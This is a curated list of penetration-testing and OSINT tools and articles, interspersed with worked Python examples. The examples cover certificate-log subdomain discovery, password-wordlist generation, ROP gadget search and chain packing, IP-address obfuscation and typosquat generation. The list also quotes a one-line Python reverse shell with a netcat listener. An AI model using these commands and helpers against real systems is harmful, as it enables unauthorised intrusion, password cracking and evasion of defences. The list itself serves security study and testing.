Automated Reconnaissance Pipeline | 428 | almost 2 years ago | : An automated target reconnaissance pipeline |
PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL | |||
subfinder | 10,277 | 11 days ago | is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing |
urlhunter | 1,512 | about 1 year ago | : a recon tool that allows searching on URLs that are exposed via shortener services |
URLBrute | 48 | almost 4 years ago | : Directory/subdomain scanner written in Go |
degoogle | 494 | over 2 years ago | : search Google and extract results directly. skip all the click-through links and other sketchiness |
Investigator | 256 | about 1 year ago | : An online handy-recon tool |
CSIRT / Pentesting / Enumeration | |||
linux-smart-enumeration | 3,443 | 11 months ago | : Linux enumeration tool for pentesting and CTFs with verbosity levels |
Ethical Hacking Course: Enumeration Theory | |||
Sublist3r | 9,885 | 4 months ago | : Fast subdomains enumeration tool for penetration testers |
subscraper | 822 | 5 months ago | : External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps |
massh-enum | 146 | about 5 years ago | : OpenSSH 7.x Mass Username Enumeration |
LinEnum | 7,032 | about 1 year ago | : Scripted Local Linux Enumeration & Privilege Escalation Checks |
linpostexp | 176 | over 4 years ago | : Linux post exploitation enumeration and exploit checking tools |
Social Mapper | A Social Media Enumeration & Correlation Tool | ||
The art of subdomain enumeration | 639 | almost 6 years ago | : This repository contains all the supplement material for the book "The art of sub-domain enumeration" |
social_mapper | 3,808 | over 2 years ago | : A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf) |
LEGION | 877 | about 1 year ago | : Automatic Enumeration Tool |
discover | 3,444 | about 2 months ago | Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit |
Z/OS System Enumeration Scripts | 63 | 18 days ago | : PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL |
WPExploitation | 0 | 11 months ago | : simple scripts to help with Windows enumeration |
CTFR | 1,972 | 11 months ago | : uses neither dictionary attacks nor brute force; it just abuses Certificate Transparency logs to find subdomains |
feroxbuster | 5,954 | 2 months ago | : A fast, simple, recursive content discovery tool written in Rust |
grinder | 290 | over 3 years ago | : Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys) |
Admin-Scanner | 157 | almost 4 years ago | : This tool is designed to find the admin panels of websites |
Virtual host scanner | 665 | almost 7 years ago | : A script to enumerate virtual hosts on a server |
vhost-brute | 84 | almost 2 years ago | : A PHP tool to brute force vhost configured on a server |
grab_beacon_config | 446 | over 3 years ago | : Nmap script to grab beacon configuration info |
assetfinder | 3,045 | 6 months ago | : Find domains and subdomains related to a given domain |
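The Certificate Transparency trick that CTFR (and, in part, assetfinder) rely on is small enough to reproduce by hand. The block below is an added example, not code from either project: it parses a constructed sample in the JSON shape crt.sh returns for a `%.example.com` query, keeps only names that are actually in scope (a look-alike such as `example.com.evil.net` is dropped), and reports wildcard entries separately, since `*.staging.example.com` is not a host but a hint that the label is worth brute-forcing. The sample data, the regex and the function names are all assumptions of this example.

```python
import json
import re

# Constructed sample in the shape of crt.sh's JSON output (not real data):
# each object carries a `name_value` field with one or more newline-separated
# names taken from the certificate's CN / SAN list.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "*.staging.example.com\nAPI.Example.COM"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "mail.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "example.com.evil.net"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "vpn.example.com\nwww.example.com"},
])

# Hostname sanity check: letter/digit/hyphen labels of 1-63 chars, at least one dot.
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9-]{2,63}$")


def _in_scope(name, domain):
    # suffix match on a label boundary, so "example.com.evil.net" is rejected
    return name == domain or name.endswith("." + domain)


def extract_hosts(crtsh_json, domain):
    """Return (hosts, wildcard_bases) found in crt.sh-style JSON for `domain`.

    hosts:          sorted, unique, lower-cased in-scope names
    wildcard_bases: sorted bases of "*." entries; these are not hosts, but they
                    signal that anything under them may exist and is worth
                    brute-forcing with a subdomain wordlist
    """
    domain = domain.lower().strip(".")
    hosts, wildcards = set(), set()
    for entry in json.loads(crtsh_json):
        for raw in entry.get("name_value", "").split("\n"):
            name = raw.strip().lower().rstrip(".")
            is_wildcard = name.startswith("*.")
            if is_wildcard:
                name = name[2:]
            if not HOSTNAME_RE.match(name) or not _in_scope(name, domain):
                continue  # garbage or out-of-scope look-alike
            (wildcards if is_wildcard else hosts).add(name)
    return sorted(hosts), sorted(wildcards)


def main():
    hosts, wildcards = extract_hosts(SAMPLE_CRTSH_JSON, "example.com")
    print("\n".join(hosts))
    print("wildcard bases:", ", ".join(wildcards))


if __name__ == "__main__":
    main()
```

Feed the `hosts` list to a resolver (CT logs contain plenty of decommissioned names) and the `wildcard_bases` to a subdomain brute-forcer; the scope check matters because crt.sh's `%.example.com` query is a substring match, not a suffix match.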
CSIRT / Pentesting / Enumeration / Wordlists: | |||
hackerone_wordlist | 0 | about 1 year ago | : The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform |
paths wordlists | |||
subdomains wordlists | |||
parameters wordlists | |||
How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists | |||
Assetnote Wordlists | : When performing security testing against an asset, it is vital to have good wordlists for content and subdomain discovery | ||
Duplicut | 881 | over 2 years ago | : Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking) |
Weakpass | rule-based online generator that creates a wordlist from a set of words entered by the user. The second link is a distributed password brute-force system focused on ease of use | ||
Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords. | 1,548 | over 2 years ago | |
Default IoT Username/password | |||
Elpscrk | 788 | about 1 month ago | : An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01) |
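Elpscrk-style profiling and Duplicut-style de-duplication are two halves of the same workflow: expand a few facts about a target into candidates, then strip the duplicates the expansion inevitably produces without sorting the list. The block below is an added example, not code from either tool. The leet map, suffix list and the use of a short BLAKE2 digest as the "seen" key are assumptions of this example.

```python
import hashlib

# Substitution table and suffixes used by this example (assumptions, extend to taste).
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}
SUFFIXES = ("", "!", "123")


def case_variants(word):
    return {word.lower(), word.capitalize(), word.upper()}


def leet_variants(word):
    """Every combination of leet substitutions at substitutable positions."""
    out = {word}
    for i, ch in enumerate(word):
        sub = LEET.get(ch.lower())
        if sub:
            out |= {w[:i] + sub + w[i + 1:] for w in list(out)}
    return out


def generate_candidates(words, years):
    """Yield password candidates built from profile words, years and suffixes.

    Order is deterministic. Duplicates are possible by design (the two-digit
    forms of 2024 and 1924 are both "24"); dedupe_stream removes them later.
    """
    bases = set()
    for word in words:
        for variant in case_variants(word):
            bases |= leet_variants(variant)
    year_parts = [""] + [str(y) for y in years] + [str(y)[-2:] for y in years]
    for base in sorted(bases):
        for year in year_parts:
            for suffix in SUFFIXES:
                yield base + year + suffix


def dedupe_stream(lines, digest_size=8):
    """Order-preserving de-duplication without sorting.

    Stores a short fixed-size hash per unique line instead of the line itself,
    which keeps memory independent of line length; a 64-bit digest makes
    collisions negligible for lists of hundreds of millions of entries.
    """
    seen = set()
    for line in lines:
        key = hashlib.blake2b(line.encode("utf-8"), digest_size=digest_size).digest()
        if key in seen:
            continue
        seen.add(key)
        yield line


def build_wordlist(words, years):
    return list(dedupe_stream(generate_candidates(words, years)))


if __name__ == "__main__":
    for candidate in build_wordlist(["alice", "rex"], [2024, 1924]):
        print(candidate)
```

`dedupe_stream` works on any iterable of lines, so the same function can be pointed at an existing multi-gigabyte file (`dedupe_stream(open(path))`) without loading or sorting it; only the hash set grows.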
CSIRT / Pentesting / Enumeration | |||
Ghost Eye | 270 | about 2 years ago | Information gathering, footprinting scanner and recon tool. Ghost Eye is an information gathering tool I made in Python 3. To run Ghost Eye, it only needs a domain or IP. Ghost Eye can work with any Linux distro that supports Python 3. Author: Jolanda de Koff |
SuperEnum | 19 | about 8 years ago | : This script does the basic enumeration of any open port along with screenshots |
Domain Dossier | : The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up | ||
X41 BeanStack | : Java Fingerprinting using Stack Traces | ||
Skanuvaty | 886 | over 2 years ago | : Dangerously fast DNS/network/port scanner |
TireFire | 148 | 11 days ago | : Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing |
OS Fingerprinting using NTP | |||
CSIRT / Pentesting / WebShells | |||
novahot | 295 | 7 months ago | : A webshell framework for penetration testers |
Weevely | 3,200 | about 1 month ago | : Weaponized web shell |
Did you know that Python's simple web server can run CGI scripts | |||
Web-Shells | 167 | almost 10 years ago | : (mostly php) |
CSIRT / Pentesting / ShellCodes | |||
Why is My Perfectly Good Shellcode Not Working? | : Cache Coherency on MIPS and ARM | ||
shellcode2asmjs | 36 | over 6 years ago | : Automatically generate ASM.JS JIT-Spray payloads |
Shellen | 891 | over 3 years ago | : Interactive shellcoding environment to easily craft shellcodes |
C-S1lentProcess1njector | : Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage | ||
CSIRT / Pentesting / ShellCodes / Windows: | |||
Unicorn | 3,736 | 10 months ago | is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory |
pe_to_shellcode | 2,374 | over 1 year ago | : Converts PE into a shellcode |
stager.dll | 170 | over 4 years ago | : Code from this |
ThreadBoat | 173 | 4 months ago | : Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application |
Excel4-DCOM | 321 | over 5 years ago | : PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe) |
MaliciousMacroMSBuild | 494 | over 5 years ago | : Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass |
SnapLoader | : Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more | ||
CSIRT / Pentesting / ShellCodes / Linux: | |||
Linux x86 Reverse Shell Shellcode | |||
mem-loader.asm | : Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by | ||
CSIRT / Pentesting / ShellCodes | |||
Shellab | : Linux and Windows shellcode enrichment utility | ||
ShellcodeWrapper | 434 | almost 8 years ago | : Shellcode wrapper with encryption for multiple target languages |
Fully (auto) interactive TTY shells | |||
CSIRT / Pentesting / ShellCodes / Reverse Shell: | |||
I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) | : nc -lnvp 1234 / python3 -c "__import__('subprocess').Popen('sh',0,None,*[__import__('socket').create_connection(('127.0.0.1',1234))]*3)" (107 chars, single statement, non-blocking) | ||
python-pty-shells | 740 | over 10 years ago | : Python PTY backdoors - full PTY or nothing! |
Powershell HTTP/S Reverse Shell | 595 | 3 months ago | : Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware |
HTTP/S Asynchronous Reverse Shell | 264 | about 3 years ago | : (POC) Asynchronous reverse shell using the HTTP protocol |
powershell reverse shell one-liner | by Nikhil SamratAshok Mittal @samratashok | ||
Reverse Shell Cheat Sheet | |||
Reverse Shell Generator | |||
How to Execute Shell Commands with Python | |||
Reverse Shell to fully interactive | |||
Single-Line Web Shell | |||
Simple-Backdoor-One-Liner.php | |||
reverse shell | |||
Spawning reverse shells | |||
Spawning interactive reverse shells with TTY | |||
Reverse Shell Cheat Sheet | |||
shellver | 289 | over 4 years ago | : Reverse Shell Cheat Sheet TooL |
GTRS | 616 | about 1 month ago | : GTRS - Google Translator Reverse Shell |
Using tmux for automating interactive reverse shells | |||
CSIRT / Pentesting / ShellCodes | |||
USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV | |||
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! | |||
Using pwntools for binary exploitation | (pt-br) | ||
CallObfuscator | 981 | almost 4 years ago | : Obfuscate specific windows apis with different apis |
vba-obfuscator | 150 | about 3 years ago | : 2018 School project - PoC of malware code obfuscation in Word macros |
ProcessInjection | 1,080 | about 1 year ago | : This program is designed to demonstrate various process injection techniques |
Ten process injection techniques: A technical survey of common and trending process injection techniques | |||
shellcoding using env variables | |||
From a C project, through assembly, to shellcode | |||
Writing and Compiling Shellcode in C | |||
Using ICMP to deliver shellcode | |||
Buffer Overflow Windows - EGGHUNTER cheatsheet | |||
metasploit, x86/alpha_mixed and Windows 7 are killing me | |||
Some lessons learned along the way to Buffer Overflow | |||
Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1 | |||
Resolving API addresses in memory | |||
Locating Kernel32 Base Address | |||
Finding Kernel32 Base and Function Addresses in Shellcode | |||
Basics of Windows shellcode writing | |||
Shellcodes database for study cases | |||
Return Oriented Programming (ROP) Attacks | |||
CSIRT / Pentesting / ShellCodes / Gadgets: | |||
ROPgadget Tool | 3,944 | about 2 months ago | |
RETURN ORIENTED PROGRAMMING (ROP) | |||
ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes | |||
one_gadget | 2,070 | 20 days ago | : The best tool for finding one gadget RCE in libc.so.6 |
JOP ROCKET | 100 | 3 months ago | : The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment |
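What ROPgadget and the prevalence paper above actually do at the lowest level is scan code bytes backwards from every `ret` and keep each start offset that disassembles cleanly. The block below is an added example, not code from ROPgadget or any other tool listed here: it implements that scan with a deliberately tiny x86-64 decoder (`pop r64` with and without the REX.B prefix, `nop`, `leave`) over constructed code bytes, and shows why one `ret` yields several overlapping gadgets. The sample bytes, the decoder's instruction subset and the helper names are assumptions of this example; a real search uses a full disassembler.

```python
import struct

# Register tables for the 0x58+r encoding (plain) and 0x41 0x58+r (REX.B, r8-r15).
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REGS64_EXT = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
RET = 0xC3
MAX_GADGET_BYTES = 6


def decode_one(buf, pos):
    """Decode one instruction at buf[pos]; return (mnemonic, length) or None."""
    b = buf[pos]
    if b == 0x41 and pos + 1 < len(buf) and 0x58 <= buf[pos + 1] <= 0x5F:
        return f"pop {REGS64_EXT[buf[pos + 1] - 0x58]}", 2   # REX.B prefix + pop
    if 0x58 <= b <= 0x5F:
        return f"pop {REGS64[b - 0x58]}", 1
    if b == 0x90:
        return "nop", 1
    if b == 0xC9:
        return "leave", 1
    return None  # anything else ends the candidate (ret included: no ret mid-gadget)


def decode_span(buf, start, end):
    """Decode buf[start:end] completely; None if any byte is not decodable."""
    pos, instrs = start, []
    while pos < end:
        d = decode_one(buf, pos)
        if d is None or pos + d[1] > end:
            return None
        instrs.append(d[0])
        pos += d[1]
    return instrs


def find_gadgets(buf, max_bytes=MAX_GADGET_BYTES):
    """Return sorted [(offset, "insn; insn; ret"), ...] for every decodable
    ret-terminated sequence of at most max_bytes bytes before a 0xC3.

    Every start offset is tried on its own, which is why the same ret yields
    "pop r14; ret" at N and the shorter "pop rsi; ret" at N+1 (the 0x5E inside
    the REX-prefixed instruction is itself a valid pop when entered mid-way).
    """
    gadgets = []
    for i, b in enumerate(buf):
        if b != RET:
            continue
        for start in range(i - 1, max(i - max_bytes, 0) - 1, -1):
            instrs = decode_span(buf, start, i)
            if instrs:
                gadgets.append((start, "; ".join(instrs + ["ret"])))
    return sorted(gadgets)


def pick(gadgets, wanted):
    """Lowest offset of an exact gadget string, or None if absent."""
    return next((off for off, text in gadgets if text == wanted), None)


def pack_chain(base, items):
    """Lay out a chain as little-endian qwords: a (offset,) tuple becomes
    base + offset (a gadget address), a plain int is emitted as-is (data a pop
    will consume)."""
    out = b""
    for item in items:
        val = base + item[0] if isinstance(item, tuple) else item
        out += struct.pack("<Q", val)
    return out


# Constructed code bytes (not taken from any real binary).
SAMPLE_TEXT = bytes.fromhex(
    "4883ec08"   # sub rsp, 8   (outside the mini decoder -> never part of a gadget)
    "5fc3"       # pop rdi; ret
    "415ec3"     # pop r14; ret (also yields "pop rsi; ret" one byte in)
    "5e5fc3"     # pop rsi; pop rdi; ret
    "c9c3"       # leave; ret
    "90c3"       # nop; ret
)

if __name__ == "__main__":
    found = find_gadgets(SAMPLE_TEXT)
    for off, text in found:
        print(f"0x{off:04x}: {text}")
    chain = pack_chain(0x400000, [(pick(found, "pop rdi; ret"),), 0x41414141,
                                  (pick(found, "leave; ret"),)])
    print(chain.hex())
```

The overlapping-gadget behaviour is the property the binary-diversification paper measures: a gadget survives a compiler transformation only if its exact bytes (including the unaligned ones) survive it.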
CSIRT / Pentesting / ShellCodes | |||
A fun trick for running shellcode directly from bash | |||
Polyglot Assembly | : Writing assembly code that runs on multiple architectures | ||
Shellcode Injection Techniques | 447 | about 3 years ago | : A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV |
Simple Shellcode Tale! | |||
Linux x86 execve("/bin/sh") - 28 bytes | |||
ShellCode Tester | 90 | 17 days ago | : An application to test windows and linux shellcodes |
Windows/x86 Dynamic Bind Shell / Null-Free Shellcode | |||
Core | 43 | about 3 years ago | : Core bypass Windows Defender and execute any binary converted to shellcode |
Finding a function's address dynamically: analysis of the block_api library | (pt-br) | ||
Ninja UUID Shellcode Runner | 433 | over 1 year ago | : Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10! |
IPFuscator | 352 | 10 months ago | : A tool to automatically generate alternative IP representations |
Shellcode Mutator | 233 | almost 2 years ago | : Mutate NASM assembly source files using no-op instruction sequences (such as NOPs) to avoid signatures |
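IPFuscator's output is only useful if you know which spellings a given parser accepts, and the defensive side of the same trick is canonicalising before any allow/deny comparison. The block below is an added example, not IPFuscator's code: it generates the alternative encodings glibc's `inet_aton()` accepts (decimal, hex, octal, dotted-hex, dotted-octal, the short `a.b` and `a.b.c` forms) plus the IPv4-mapped IPv6 form, and a `normalize()` that folds any of them back to a dotted quad. The encoding names and helper names are assumptions of this example; the behaviour relies on `socket.inet_aton` being backed by the platform's `inet_aton`, which is the case on Linux and BSD/macOS.

```python
import ipaddress
import socket
import struct


def ip_alternatives(ip):
    """Alternative spellings of a dotted-quad IPv4 that inet_aton() still
    accepts. Keys name the encoding; every value decodes to the same address."""
    packed = socket.inet_aton(ip)
    o = list(packed)
    n = struct.unpack("!I", packed)[0]
    return {
        "decimal":      str(n),                                        # 2130706433
        "hex":          f"0x{n:x}",                                    # 0x7f000001
        "octal":        f"0{n:o}",                                     # 017700000001
        "dotted_hex":   ".".join(f"0x{b:x}" for b in o),               # 0x7f.0x0.0x0.0x1
        "dotted_octal": ".".join(f"0{b:o}" for b in o),                # 0177.00.00.01
        "a.b":          f"{o[0]}.{(o[1] << 16) | (o[2] << 8) | o[3]}", # 127.1
        "a.b.c":        f"{o[0]}.{o[1]}.{(o[2] << 8) | o[3]}",         # 127.0.1
        "v4mapped":     f"::ffff:{o[0]}.{o[1]}.{o[2]}.{o[3]}",         # ::ffff:127.0.0.1
    }


def normalize(text):
    """Canonical dotted-quad for any of the spellings above.

    This is the defender's half: canonicalise first, then compare against the
    allow/deny list. inet_aton handles the IPv4 spellings; the ipaddress module
    unwraps IPv4-mapped IPv6 and raises ValueError on anything else.
    """
    try:
        return socket.inet_ntoa(socket.inet_aton(text))
    except OSError:
        pass
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return str(addr.ipv4_mapped)
    return str(addr)


def check_all(ip):
    """Map each encoding of `ip` to whether normalize() recovers the original."""
    return {name: normalize(alt) == ip for name, alt in ip_alternatives(ip).items()}


if __name__ == "__main__":
    for name, alt in ip_alternatives("127.0.0.1").items():
        print(f"{name:13s} {alt:22s} -> {normalize(alt)}")
    # Leading zeros are octal to inet_aton, so "010.0.0.1" is 8.0.0.1, not 10.0.0.1.
    print("010.0.0.1 ->", normalize("010.0.0.1"))
```

Two caveats worth remembering when you use these against a target: a zero-padded decimal such as `010.0.0.1` is *not* 10.0.0.1 to `inet_aton` (leading zero means octal), and parsers disagree with each other, which is exactly what makes the mismatch between a validating layer and the layer that finally opens the connection exploitable. Recent Python versions reject leading zeros in `ipaddress` for that reason, so do not assume every library behaves like `inet_aton`.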
CSIRT / Pentesting / Reporting | |||
public-pentesting-reports | 8,498 | 6 months ago | : Curated list of public penetration test reports released by several consulting firms and academic security groups |
report-ng | 66 | 10 months ago | : Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base |
PandocPentestReport | 10 | about 5 years ago | : This repository shows my effort to create a pandoc based pentest report template |
Technical Report template | 2 | over 9 years ago | : LaTeX template for technical reports |
TryHackMe. Breaking Into the Kenobi Machine. | |||
PwnDoc | : A pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report | ||
This is how you can deliver true value through your pentest reports | |||
Offensive Security Exam Report Template in Markdown | 3,558 | 21 days ago | : Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report |
A List of Post-mortems! | 11,316 | 4 months ago | : A collection of postmortems. Sorry for the delay in merging PRs! |
CSIRT / Pentesting / OSINT - Open Source INTelligence | |||
Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19. | 61 | almost 7 years ago | |
OSINT tool for visualizing relationships between domains, IPs and email addresses. | |||
sn0int | 2,058 | about 2 months ago | : Semi-automatic OSINT framework and package manager |
OSINT – Passive Recon and Discovery of Assets | A Pentester's Guide, Part 1 | ||
OSINT – LinkedIn is Not Just for Jobs | A Pentester's Guide, Part 2 | ||
iKy | : I Know You (OSINT project) | ||
Gitrob | 5,938 | about 2 years ago | : Putting the Open Source in OSINT |
OSINT Tools | : On this page you'll find tools which can help with your OSINT research | ||
datasploit | 3,032 | over 4 years ago | : An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats |
the-endorser | 327 | over 3 years ago | : An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills |
OSINT-y Goodness | : HathiTrust Digital Library | ||
OSINT Resources for 2019 | |||
Awesome OSINT | 19,100 | 12 days ago | : 😱 A curated list of amazingly awesome OSINT |
OSINT-y Goodness, №14 | Directory of Open Access Journals | ||
Twitter Analysis | Identifying A Pro-Indonesian Propaganda Bot Network | ||
TWINT | 15,833 | over 1 year ago | : An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations |
Breaking Mimblewimble's Privacy Model | : Mimblewimble's privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% of Grin transactions in real time | ||
snscrape | 4,490 | about 1 year ago | : A social networking service scraper in Python |
ꓘamerka GUI | Hack the planet with ꓘamerka GUI: Ultimate Internet of Things/Industrial Control Systems reconnaissance tool (ICS/IoT search) | ||
dmi-tcat | 367 | 16 days ago | : Digital Methods Initiative - Twitter Capture and Analysis Toolset |
KnockKnock | 181 | over 1 year ago | : A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes |
From email to phone number, a new OSINT approach | |||
recox | 318 | 6 months ago | : Master script for web reconnaissance |
openSquat | 729 | 4 months ago | : an open source intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams |
Trace Labs Kali Linux build configuration | 680 | over 1 year ago | |
natlas | 626 | 4 months ago | : Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned |
sifter | : an OSINT, recon & vulnerability scanner. It combines a plethora of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within Microsoft products and, if unpatched, exploit them | ||
Kitsune | 242 | over 2 years ago | : An artificial neural network to detect automated Twitter accounts (bots) |
Image "Cloaking" for Personal Privacy | |||
OSINT-Brazuca | 1,636 | about 2 months ago | (pt-br) : Repositório criado com intuito de reunir informações, fontes(websites/portais) e tricks de OSINT dentro do contexto Brasil |
WhatsMyName | : This tool allows you to enumerate usernames across many websites | ||
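openSquat above looks for the squatting variants of a brand's domain; the candidate generation behind that is a handful of string transforms, and running them in reverse lets you label a suspicious domain you found in CT logs or passive DNS. The block below is an added example, not openSquat's own code: it generates omission, transposition, repetition, keyboard-neighbour replacement, ASCII look-alike, hyphenation, TLD-swap and Cyrillic IDN-homograph candidates for a second-level domain, classifies an observed name by the technique that produced it, and renders the A-label (`xn--`) form a homograph takes on the wire. The neighbour table, look-alike tables and TLD list are assumptions of this example.

```python
# Tables used by this example (assumptions, not openSquat's tables).
QWERTY = {
    "q": "wa", "w": "qeas", "e": "wrsd", "r": "etdf", "t": "ryfg", "y": "tugh",
    "u": "yihj", "i": "uojk", "o": "ipkl", "p": "ol",
    "a": "qwsz", "s": "awedxz", "d": "serfcx", "f": "drtgvc", "g": "ftyhbv",
    "h": "gyujnb", "j": "huikmn", "k": "jiolm", "l": "kop",
    "z": "asx", "x": "zsdc", "c": "xdfv", "v": "cfgb", "b": "vghn", "n": "bhjm", "m": "njk",
}
ASCII_LOOKALIKES = {"l": ["1", "i"], "i": ["l", "1"], "o": ["0"], "e": ["3"],
                    "a": ["4"], "m": ["rn"], "w": ["vv"], "d": ["cl"]}
# Cyrillic letters whose glyphs match Latin ones in most fonts.
CYRILLIC = {"a": "\u0430", "e": "\u0435", "o": "\u043e", "p": "\u0440", "c": "\u0441", "x": "\u0445"}
TLDS = ("com", "net", "org", "co", "io")


def generate(domain):
    """Return {candidate: technique} for a second-level domain like 'example.com'.

    Techniques run in a fixed order and the first one to produce a string
    wins, so classify() is deterministic.
    """
    name, _, tld = domain.lower().partition(".")
    out = {}

    def add(cand, technique):
        if cand != domain and cand not in out:
            out[cand] = technique

    for i in range(len(name)):                                # exmple
        add(name[:i] + name[i + 1:] + "." + tld, "omission")
    for i in range(len(name) - 1):                            # exmaple
        add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld, "transposition")
    for i in range(len(name)):                                # exxample
        add(name[:i] + name[i] + name[i:] + "." + tld, "repetition")
    for i, ch in enumerate(name):                             # rxample
        for adj in QWERTY.get(ch, ""):
            add(name[:i] + adj + name[i + 1:] + "." + tld, "replacement")
    for i, ch in enumerate(name):                             # examp1e
        for look in ASCII_LOOKALIKES.get(ch, []):
            add(name[:i] + look + name[i + 1:] + "." + tld, "homoglyph")
    for i in range(1, len(name)):                             # ex-ample
        add(name[:i] + "-" + name[i:] + "." + tld, "hyphenation")
    for alt in TLDS:                                          # example.net
        add(name + "." + alt, "tld")
    for i, ch in enumerate(name):                             # exаmple (Cyrillic а)
        if ch in CYRILLIC:
            add(name[:i] + CYRILLIC[ch] + name[i + 1:] + "." + tld, "idn")
    return out


def classify(observed, domain):
    """Technique that turns `domain` into `observed`, or None if it is not a
    one-step squat of it."""
    return generate(domain).get(observed.lower())


def punycode(candidate):
    """A-label form as it appears in DNS and CT logs (xn-- for non-ASCII labels)."""
    return candidate.encode("idna").decode("ascii")


if __name__ == "__main__":
    for cand, technique in generate("example.com").items():
        print(f"{technique:13s} {cand:20s} {punycode(cand)}")
```

Resolve the candidates (or query them against CT logs as in the CTFR example) to find which are registered; the `punycode()` form is the one to search for, since the Unicode spelling never appears in DNS data.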
CSIRT / Pentesting / OSINT - Open Source INTelligence / WhatsMyName | |||
Maltego Transforms for WhatsMyName | 63 | over 1 year ago | |
CSIRT / Pentesting / OSINT - Open Source INTelligence | |||
shadowbanned | : Shadowban Tester for Twitter | ||
sherlock | 60,468 | 9 days ago | : Hunt down social media accounts by username across social networks |
usufy | 7 | almost 10 years ago | : A GPLv3+ tool that checks whether a profile exists for a given username on a bunch of different platforms. It uses the error messages most platforms display when a profile is not found as the evidence for whether a given profile exists |
osrf | 928 | 7 months ago | : OSRFramework, the Open Sources Research Framework, is an AGPLv3+ project by i3visio focused on providing APIs and tools to perform more accurate online research |
IntelMQ | : A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs, abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give incident responders an easy way to collect & process threat intelligence, thus improving the incident handling processes of CERTs | ||
OSINT SAN Framework. | (ru) : OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills | ||
Scrummage | 512 | about 1 year ago | : The Ultimate OSINT and Threat Hunting Framework |
viper | 3,745 | about 2 months ago | : Intranet pentesting tool with webui 开源图形化内网渗透工具 |
⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾ | 815 | 5 months ago | : a Passive Open Source Intelligence (OSINT) Automated Reconnaissance framework |
3WiFi | : Free Wireless Database | ||
Stealth plane in flight | |||
ExportData | Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations | ||
